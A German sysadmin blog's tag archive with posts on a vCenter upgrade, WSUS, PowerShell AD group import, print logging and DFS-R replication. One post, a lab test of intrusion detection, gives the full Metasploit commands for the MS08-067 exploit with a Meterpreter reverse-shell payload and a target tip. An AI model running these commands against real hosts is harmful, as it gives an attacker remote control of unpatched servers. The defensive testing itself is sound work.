Artikel mit ‘Work’ getagged

Upgrade vCenter Appliance von 6.0 -> 6.5

Montag, 19. Juni 2017

Zu Beginn -> Backup / Snapshot des „alten“ vCenters!!

Einen ersten Eindruck des Setups kann man sich hier ansehen:
https://v-punk.com/how-to-upgrade-vcsa-6-0-to-vcsa-6-5/

Wenn man die neue 6.5er Appliance mit dem „alten“ Namen deployen möchte – sollte man die alte VM vorher einfach umbenennen.
Dann ist es natürlich auch nicht verkehrt einen anderen Datastore zu nehmen…

Bevor es wirklich losgeht ->>
1. Überprüfen ob das root Password nicht abgelaufen ist
-> A general system error occurred: vix error codes = (1, 4294967293).
–>> https://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2147895

2. Den Migrations Assistenten auf dem Server mit dem Update Manager starten
-> There is no MA extension for VUM available on source VC.
–>> http://pubs.vmware.com/vsphere-65/index.jsp?topic=%2Fcom.vmware.vsphere.upgrade.doc%2FGUID-6A39008B-A78C-4632-BC55-0517205198C5.html

3. Evtl. vorher mal prüfen ob die Datenbank Sequenzen den richtigen Owner haben
-> Database in-place upgrade failed. Please see vcdb_inplace.err and vcdb_inplace.out for details.
–>> https://communities.vmware.com/thread/548057

4. Fehler bei Schritt 3
-> Error attempting Vcintegrity Export file does not exist or is corrupted, abort import
–>> https://communities.vmware.com/thread/546958
—>>>> Bei mir hat ein Reboot der neuen Appliance zumindest eine 6.5er Appliance zurückgelassen auf der alles bis auf den Update Manager migriert war…

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)

Test Intrusion Detection mit Metasploit / Kali 2.0

Montag, 28. September 2015

Um die Intrusion Detection unseres Netzwerkes zu testen, habe ich ein wenig mit Kali / Metasploit herum experimentiert.

Als Ziel habe ich einen ungepatchten Windows 2003 R2 Server (deutsch) auf einem ESXi verwendet.

Als Angreifer kam ein Kali 2.0 ebenfalls auf einem ESXi zum Einsatz.

Als Exploit bietet sich hier immer der MS08_067 an, da dieser in der Regel relativ zuverlässig „zündet“.

Jedoch leider nicht auf meinem Deutschen Server – hierfür ist ggf. die dedizierte Angabe des Targets nötig.


msfconsole -q
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST Ziel.IP
set LHOST Quell.IP
set target 66
exploit

Ohne die Angabe des Target stürzt der Server Dienst am Ziel immer „nur“ ab – jedoch wird der Payload nicht ausgeführt.

Mit Show Targets kann man sich alle Möglichkeiten anzeigen lassen – wobei hier das NX oder NO NX glaube ich eine entscheidende Rolle spielt 🙂

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)

WSUS – Umgang mit ersetzten / superseded Updates

Dienstag, 25. August 2015

Da ich es immer mal wieder Nachschlagen muss – hier ein Link:

How to identify and decline superseded updates in WSUS

  • No icon: update doesn’t supersede another one nor is it superseded by an update
  • Blue square on top: this update supersedes another update, these updates you do not want to clean…!!
  • Blue square in the middle: this update has been superseded by another update, and superseded another update as well, this is an example of an update you may want to clean (decline)
  • Blue square in the right below corner: this update has been superseded by another update, this is an example of an update you may want to clean (decline)

 

VN:F [1.9.22_1171]
Rating: 5.5/10 (2 votes cast)

Powershell – AD Gruppen aus csv Import

Montag, 20. Juli 2015

Bevor ich es mal wieder vergesse:

Import-Module ActiveDirectory

import-csv c:\liste.csv | foreach {New-ADGroup -Name $_.name -Path "OU=Hallo,DC=Welt,DC=it" -SamAccountName $_.name -GroupCategory 1 -GroupScope 1}

Das CSV enthält in der ersten Zeile die Überschrift name und darunter in jeder Zeile einen Gruppennamen:

name
RG-Gruppe01
RG-Gruppe02
….

Erläuterung:
GroupCategory:
Distribution or 0
Security or 1

GroupScope:
DomainLocal or 0
Global or 1
Universal or 2

Weitere Details gibt es hier:
Microsoft Technet – New-ADGroup
Microsoft Technet – Verwenden des Cmdlet „Import-Csv“
Andi Sichel – Active Directory: Benutzer, Gruppen und OUs via Powershell

VN:F [1.9.22_1171]
Rating: 0.0/10 (0 votes cast)

Druckjobs im Windows Server > 2008 loggen

Dienstag, 09. September 2014

Nun der eigentliche Grund warum ich mich heute in den Admin Bereich meines Blogs begeben habe.

Seit Windows 2008 werden Druckjobs nicht mehr per Default im Eventlog des Printservers gespeichert – da das manchmal aber ganz hilfreich ist kann man dies aber auch wieder aktivieren. Sehr Hilfreich ist hier die wirklich gute Übersetzung des deutschen Windows Servers …..

Operational -> Betriebsbereit

Also – Ereignisanzeige starten -> Anwendungs- und Dienstprotokolle -> Microsoft -> Windows -> PrintService -> Betriebsbereit

Ein Rechtsklick auf „Betriebsbereit“ fördert ein Kontextmenü zu Tage in welchem man dann das Protokoll aktivieren kann:

Um schnell und komfortabel an das Log zu kommen – kann  man sich dieses einfach unter den Benutzerdefinierten Ansichten ablegen:

2014-09-09_09h27_55

2014-09-09_09h28_16

2014-09-09_09h33_59

2014-09-09_09h34_26

So sieht dann das Ergebnis aus:

2014-09-09_09h34_46

VN:F [1.9.22_1171]
Rating: 7.0/10 (1 vote cast)

2012 Server Gruppenrichtlinien Repliaktion
SYSVOL / NETLOGON Replikation defekt

Freitag, 31. Januar 2014

-UPDATE-Um DFS-R in den AutoRecocery Modus zu schalten – liest man diesen Microsoft Support Artikel 🙂 -/UPDATE-
Sooo da es mich einmal mehr nervt – schreib ich es jetzt hier auf.

Beim Herunterfahren z.B. nach Updates bleiben meine W2k12 Server gerne einmal stehen, so dass ich sie immer noch zusätzlich mit /force durchstarte.
Dieses Phänomen tritt auch min. in noch einer mir bekannten Umgebung auf (Gruß an KME)

Das an sich wäre ja noch nicht so schlimm – leider bleibt dann auch oft (immer?!) der DFSR Dienst der Domain Controller stehen – was sich dann in nicht mehr replizierten SYSVOL und NETLOGON Ordner äußert.

Der tolle neue Servermanager meldet – ALLES GRÜN
2014-01-31_11h40_03

Im Eventlog des DFS sieht das schon anders aus:
(mehr …)

VN:F [1.9.22_1171]
Rating: 10.0/10 (1 vote cast)